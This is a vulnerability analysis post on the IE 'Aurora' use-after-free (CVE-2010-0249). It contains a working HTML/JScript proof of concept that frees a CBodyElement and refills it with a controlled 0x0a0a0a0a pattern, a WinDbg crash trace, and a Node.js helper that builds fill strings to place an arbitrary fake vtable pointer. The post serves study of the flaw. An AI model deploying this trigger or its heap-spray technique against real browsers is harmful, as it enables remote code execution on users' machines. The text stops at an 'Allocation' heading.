
CVE-2010-0249 Aurora

The legendary Aurora vulnerability

Microsoft Internet Explorer invalid event operation memory corruption vulnerability

Microsoft Internet Explorer is the web browser bundled by default with the Microsoft Windows operating system.
Internet Explorer contains a memory corruption vulnerability in its handling of invalid event operations. Because the reference count is not incremented after an object is created, a malicious sequence of object operations can leave a pointer referring to memory that has already been freed and then reused. A remote attacker can lure a user into visiting a malicious web page and, by manipulating memory through this invalid access, execute arbitrary code on the user's system.

 

The PoC is as follows:

<html>
  <head>
    <script>
      var obj, event_obj;

      // Fired by the <img> onload. Captures the event (whose srcElement is the
      // <img>), then removes the image by clearing the span, and schedules ev2.
      function ev1(evt)
      {
        event_obj = document.createEventObject(evt);
        document.getElementById("sp1").innerHTML = "";
        window.setInterval(ev2, 1);
      }

      // Runs every 1 ms: fills the data of the 200 COMMENT nodes with the
      // 0x0a0a0a0a pattern, then touches srcElement of the saved event, which
      // dereferences the element that has already been freed.
      function ev2()
      {
        var data, tmp;
        data = "";
        tmp = unescape("%u0a0a%u0a0a");
        for (var i = 0 ; i < 4 ; i++) data += tmp;
        for (i = 0 ; i < obj.length ; i++ ) {
          obj[i].data = data;
        }
        event_obj.srcElement;
      }

      obj = new Array();
      event_obj = null;
      for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");
    </script>
  </head>
  <body>
    <span id="sp1">
      <img src="aurora.gif" onload="ev1(event)">
    </span>
  </body>
</html>

I could not find a suitable PoC; this one is something I modified from an exploit found online, and it is somewhat cumbersome.

 

Getting straight to the point: it is immediately apparent that this is a use-after-free of a CBody object.

1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e
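The faulting instruction is mov eax,[ecx]: the first dword of the object is read as its vtable pointer. Under page heap (as in the dump above) the freed page is unmapped, so the read faults at once and ecx still points into the dead block. Without page heap the block can be handed back to the next allocation of a similar size, which is what the loop in ev2() is for: each COMMENT node's .data is set to the unescape("%u0a0a%u0a0a") string, so whichever of those strings lands in the freed slot makes [ecx] read as the attacker-chosen value 0x0a0a0a0a. The block below is an added example written for this page, not code from the original post; it models that byte layout offline (the heap slot is just a Node Buffer, an assumption, not IE's allocator) and generalises the PoC's filler to an arbitrary 32-bit value. decodePercentU, buildFill, toUtf16le, vtableFromBlock and fillForPointer are names chosen here.

```javascript
// Added example: how the PoC's fill string becomes the fake vtable pointer
// that mov eax,[ecx] would read once the freed CBodyElement slot is reused.

// JScript's unescape() understands the non-standard "%uXXXX" syntax; decode it
// ourselves so the example does not depend on the deprecated global.
function decodePercentU(s) {
  return s.replace(/%u([0-9a-fA-F]{4})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Build the fill string exactly as ev2() does: the decoded unit repeated.
function buildFill(escaped, reps) {
  const tmp = decodePercentU(escaped);
  let data = "";
  for (let i = 0; i < reps; i++) data += tmp;
  return data;
}

// JScript strings are UTF-16LE in memory; this is the byte image that occupies
// the reused heap block (modelled here as a Buffer, an assumption).
function toUtf16le(str) {
  return Buffer.from(str, "utf16le");
}

// The first dword of a C++ object is its vtable pointer; read it back the way
// the x86 load at CElement::Doc does (little-endian).
function vtableFromBlock(bytes) {
  return bytes.readUInt32LE(0);
}

// Generalisation beyond the PoC: the fill string that places an arbitrary
// 32-bit value as the first dword. Low half first because of little-endian
// byte order; each %uXXXX is one 16-bit code unit.
function fillForPointer(value, reps) {
  const lo = (value & 0xffff).toString(16).padStart(4, "0");
  const hi = ((value >>> 16) & 0xffff).toString(16).padStart(4, "0");
  return buildFill(`%u${lo}%u${hi}`, reps);
}

// Usage: reproduce the PoC's filler and show what [ecx] would read as.
const pocFill = buildFill("%u0a0a%u0a0a", 4);
const block = toUtf16le(pocFill);
console.log(block.length + " bytes, first dword = 0x" +
  vtableFromBlock(block).toString(16));
```

Because every byte of the filler is 0x0a, any later dereference relative to the fake vtable pointer also lands on a 0x0a0a0a0a-valued dword, which is why a single repeated value is enough for the filler; the actual size the filler must have to be placed into the freed slot is not shown on this page and is not assumed here.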

 

Allocation
